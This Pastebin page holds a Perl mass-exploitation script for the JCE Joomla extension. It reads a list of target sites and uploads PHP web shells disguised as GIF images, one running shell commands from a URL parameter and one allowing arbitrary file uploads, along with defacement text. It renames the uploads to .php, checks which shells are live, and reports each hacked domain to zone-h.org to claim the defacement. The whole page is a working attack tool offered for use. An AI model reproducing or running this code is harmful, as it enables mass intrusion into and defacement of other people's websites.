API tools faq
paste
Advertisement
Guest User

Untitled

a guest
May 2nd, 2016
69
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.31 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl -W
  2.  
  3. use Socket;
  4. use IO::Socket;
  5. use IO::Socket::INET;
  6. use LWP::UserAgent;
  7. use HTTP::Request::Common qw(POST);
  8. use HTTP::Request::Common qw(GET);
  9. $ag = LWP::UserAgent->new();
  10. $ag->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  11. $ag->timeout(10);
  12. #Recodado por No\One
  13. #print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n";
  14. #print "\t|||| Coded by: Mostafa Azizi (admin[@]0-Day[dot]net) ||||\n\n";
  15.  
  16. if($0 =~ /^(.*)\\(.+)$/){chomp($a = $2);}else{chomp($a = $0);}
  17.  
  18. if(!defined($ARGV[0])) { print "\n * Modo de usar => $a lista.txt ou $a -s www.site.com.br \n"; exit; }
  19.  
  20. $TXT = $ARGV[0]; if($TXT eq "-s"){@TXT = $ARGV[1]; $aq = $ARGV[1];
  21. if(!defined($ARGV[1])) { print "\n\n * Modo de usar => $a lista.txt ou $a -s www.site.com\n\n"; exit; }
  22. }else{open(TXT,"<$TXT"); chomp(@TXT=<TXT>); close(TXT); $aq = $ARGV[0];}
  23. $tx = $#TXT+1;
  24. print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.2 .::.\n\n";
  25.  
  26. $ok = '0'; $erro = '0';
  27. site: foreach(@TXT){ chomp(my $site = $_);
  28. $cm=''; $porra = '0';
  29. if($site =~ /http:\/\/(.*)\/(.*)\//){$site = $1; $cm = $2;
  30. }elsif($site =~ /http:\/\/(.*)\/(.*)/){$site = $1; $cm = $2;
  31. }elsif($site =~ /https:\/\/(.*)\/(.*)\//){$site = $1; $cm = $2;
  32. }elsif($site =~ /https:\/\/(.*)\/(.*)/){$site = $1; $cm = $2;
  33. }elsif($site =~ /http:\/\/(.*)\//){$site = $1;
  34. }elsif($site =~ /http:\/\/(.*)/){$site = $1;
  35. }elsif($site =~ /https:\/\/(.*)\//){$site = $1;
  36. }elsif($site =~ /https:\/\/(.*)/){$site = $1;
  37. }elsif($site =~ /(.*)\/(.*)\//){$site = $1; $cm = $2;
  38. }elsif($site =~ /(.*)\/(.*)/){$site = $1; $cm = $2;
  39. }elsif($site =~ /(.*)\//){$site = $1;}
  40.  
  41. $http = 'http://'; $porta = "80";
  42.  
  43. $script = '/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20';
  44. $up = '/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b';
  45.  
  46. print "\n>> $site ->";
  47. $cs++;
  48. system "title $a $aq - [ $cs\/$tx ] =-= Zone-H [ OK ($ok) ~ ERRO ($erro) ]";
  49. ############################################### Packet 1 --> checking misses
  50. if($cm){ $script = '/'."$cm"."$script"; $up = '/'."$cm"."$up"; }
  51.  
  52. $pageURL= "$http"."$site"."$script";
  53. $getp = $ag->request(HTTP::Request->new(GET => $pageURL));
  54. $get = $getp->content;
  55. if($get !~ m/multipart\/form-data|hastip|\/plugins\/editors\/jce\//g){ print " [!]"; next site;}
  56.  
  57. my @index = (
  58. '../../xk.txt',
  59. '../../xh.txt',
  60. '../../ck.htm',
  61. '../../tmp/x.html',
  62. '../../cache/x.html',
  63. '../x.html',
  64. '../../tmp/ck.htm',
  65. '../../cache/ck.htm',
  66. '../ck.htm',
  67. '../xxx.php',
  68. '../xxu.php');
  69.  
  70. if($cm){push(@index,'../../../x.htm','../../../x.html','../../../x.php','../../../xk.txt','../../../xh.txt','../../../ck.htm');}
  71.  
  72. push(@index,'../../x.php','../../x.php');
  73.  
  74. foreach(@index){
  75. chomp(my $indx = $_);
  76. $porra++;
  77.  
  78. if($indx =~ /xk/){ $narq = 'arti'."$porra";
  79. $cont = 'Invasão feita por Renatinho';}
  80.  
  81. if($indx =~ /xh/){ $narq = 'not'."$porra";
  82. $cont = 'Invasão feita por Renatinho';}
  83.  
  84. if($indx =~ /configuration/){ $narq = 'clor'."$porra";
  85. $cont = 'Invasão feita por Renatinho<?php exit;?>';}
  86.  
  87. if($indx =~ /index|ck/){ $narq = 'plas'."$porra";
  88. $cont = 'Invasão feita por Renatinho';}
  89.  
  90. if($indx =~ /xxx/){ $narq = 'gligie'."$porra";
  91. $cont = 'GIF89a
  92. <?php system("$_GET[cmd]"); exit; ?>';}
  93.  
  94. if($indx =~ /xxu/){ $narq = 'tir'."$porra";
  95. $cont = 'GIF89a u
  96. <?php @copy($_FILES[file][tmp_name], $_FILES[file][name]); exit; ?>';}
  97.  
  98.  
  99. #print "\n\n $indx - $narq \n$cont \n\n----------------------------------------------";
  100.  
  101.  
  102. ############################################### Packet 2 --> Leveling as a. Gif
  103. $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$site" ,PeerPort=>"$porta", Timeout=>"10") or " Erro!" and next site;
  104. print $remote "POST $up HTTP/1.1"."\n";
  105. print $remote "Host: $site"."\n";
  106. print $remote "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801"."\n";
  107. print $remote "Content-Type: multipart/form-data; boundary=---------------------------41184676334"."\n";
  108. print $remote "Content-Length: 769"."\n\n";
  109. print $remote "-----------------------------41184676334"."\n";
  110. print $remote 'Content-Disposition: form-data; name="upload-dir"'."\n\n";
  111. print $remote '/'."\n";
  112. print $remote "-----------------------------41184676334"."\n";
  113. print $remote 'Content-Disposition: form-data; name="Filedata"; filename=""'."\n";
  114. print $remote 'Content-Type: application/octet-stream'."\n\n\n";
  115. print $remote "-----------------------------41184676334"."\n";
  116. print $remote 'Content-Disposition: form-data; name="upload-overwrite"'."\n\n";
  117. print $remote "0"."\n";
  118. print $remote "-----------------------------41184676334"."\n";
  119. print $remote 'Content-Disposition: form-data; name="Filedata"; filename="'.$narq.'.gif"'."\n";
  120. print $remote 'Content-Type: image/gif'."\n\n";
  121. print $remote "$cont"."\n";
  122. print $remote "-----------------------------41184676334"."\n";
  123. print $remote 'Content-Disposition: form-data; name="upload-name"'."\n\n";
  124. print $remote "$narq"."\n";
  125. print $remote "-----------------------------41184676334"."\n";
  126. print $remote 'Content-Disposition: form-data; name="action"'."\n\n";
  127. print $remote 'upload'."\n";
  128. print $remote "-----------------------------41184676334--"."\n\n";
  129. close($remote);
  130.  
  131. ############################################### Packet 3 --> Changing name of estenxão. Gif to. Php
  132. $remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site" ,PeerPort=>"$porta", Timeout=>"10") or " Erro!" and next site;
  133. $json = 'json={"fn":"folderRename","args":["'.$narq.'.gif","'.$indx.'"]}';
  134. print $remote "POST $script HTTP/1.1"."\n";
  135. print $remote "Host: $site"."\n";
  136. print $remote "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801"."\n";
  137. print $remote 'Content-Type: application/x-www-form-urlencoded; charset=utf-8'."\n";
  138. print $remote 'X-Request: JSON'."\n";
  139. print $remote "Content-Length: ".length($json).""."\n\n";
  140. print $remote "$json"."\n\n";
  141. #while(<$remote>){print "$_";}
  142. close($remote);
  143. }
  144. ############################################### Packet 4 --> Checando resultado do upload
  145. my @xxx=('/images/xxu.php','/images/xxx.php');
  146. if($cm){ push(@xxx,'/'."$cm".'/images/xxu.php','/'."$cm".'/images/xxx.php'); }
  147. foreach(@xxx){
  148. $shc = 'http://'."$site"."$_";
  149. my $resc=$ag->request(HTTP::Request->new(GET => $shc));
  150. $respc = $resc->content;
  151. if($respc =~ m/GIF89a/g){ open(SHU,">>SH.txt"); print SHU "$shc\n"; close(SHU); } }
  152.  
  153. my @indxs = ('/','/ck.htm','/xk.txt','/xh.txt','/tmp/','/cache/','/images/','/tmp/ck.htm','/cache/ck.htm','/images/ck.htm');
  154. if($cm){
  155. push(@indxs,'/'."$cm".'/','/'."$cm".'/ck.htm','/'."$cm".'/xk.txt','/'."$cm".'/xh.txt','/'."$cm".'/tmp/','/'."$cm".'/cache/','/'."$cm".'/images/','/'."$cm".'/tmp/ck.htm','/'."$cm".'/cache/ck.htm','/'."$cm".'/images/ck.htm')}
  156.  
  157. foreach(@indxs){ chomp(my $iind = $_);
  158.  
  159. $urst = 'http://'."$site"."$iind";
  160. my $res=$ag->request(HTTP::Request->new(GET => $urst));
  161. $resp = $res->content;
  162. if($resp =~ m/KkK1337/g){ $sthckd = "$site"."$iind";
  163. $sockz = IO::Socket::INET->new(PeerAddr => "www.zone-h.org", PeerPort => "80", Proto => "tcp") or next;
  164. print $sockz "POST /notify/single HTTP/1.0\r\n";
  165. print $sockz "Accept: */*\r\n";
  166. print $sockz "Referer: http://www.zone-h.org/notify/single\r\n";
  167. print $sockz "Accept-Language: pt-br\r\n";
  168. print $sockz "Content-Type: application/x-www-form-urlencoded\r\n";
  169. print $sockz "Connection: Keep-Alive\r\n";
  170. print $sockz "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801\r\n";
  171. print $sockz "Host: www.zone-h.org\r\n";
  172. $length=length("defacer=KkK1337&domain1=http%3A%2F% 2F$sthckd&hackmode=17&reason=1");
  173. print $sockz "Content-Length: $length\r\n";
  174. print $sockz "Pragma: no-cache\r\n";
  175. print $sockz "\r\n";
  176. print $sockz "defacer=KkK1337&domain1=http%3A%2F%2F$sthckd&hackmode=17&reason=1\r\n";
  177. $zn = join('',<$sockz>);
  178. if($zn =~ m/ERROR:/g){print " [ Zone-H ] ".$http.$sthckd." [ ERRO ]"; $erro++;}else{print " [ Zone-H ] ".$http.$sthckd." [ OK ]"; $ok++;}
  179. close($sockz);
  180. open(HCKDS,">>HCKDS.txt"); print HCKDS "$http"."$sthckd\n"; close(HCKDS);
  181. $sthckd = ''; $hk++; next site;}
  182. } }
  183.  
  184. if(!$hk){$hk=0;}if(!$ok){$ok=0;}if(!$erro){$erro=0;}
  185. if($hk){
  186. print "\n\n [ Total Hacked -> $hk -#- Success sended Zone-h -> $ok -#- Error sended to Zone-h -> $erro ]\n\n";}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!